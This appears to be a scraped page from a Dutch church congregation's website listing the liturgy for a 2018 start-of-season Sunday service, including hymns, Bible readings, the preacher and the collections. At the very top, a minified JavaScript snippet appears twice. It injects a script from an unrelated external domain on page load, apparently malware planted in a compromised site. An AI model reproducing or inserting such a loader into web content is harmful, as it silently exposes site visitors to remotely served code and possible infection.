;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 23 september 2018 9:30 uur - PKN Damwâld
zondag 23 september 2018
09:30 uur

Kerkdienst zondag 23 september 2018 9:30 uur

Thema: Startzondag

Informatie

Voorganger:Ds. G.J. Otter
Thema:Startzondag
Liturgie
Sign zingt voor de dienst .
Welkom en mededelingen
We zingen: Gez.444: 1,2 en 3
Stilgebed, Votum en groet
We zingen: Opw.124:1,2 en 3
geloofsbelijdenis
We zingen: Opw.612
Gebed
We lezen: Marc.8:27 - Marcus 9:1
Sketch
We zingen: Opw.642
Preek .
We zingen: Opw.630
Gebed
Henry vertelt iets over het project bij World Servants
Collecte
We zingen: Gez.293:1,3 en 4 (op wijs van Rose)
Zegen
Sign zingt .
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: de Ontmoeting Foarwei 38, 9104 BX Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Diaconie
Tweede collecte: Kerk
Uitganscollecte: Kerk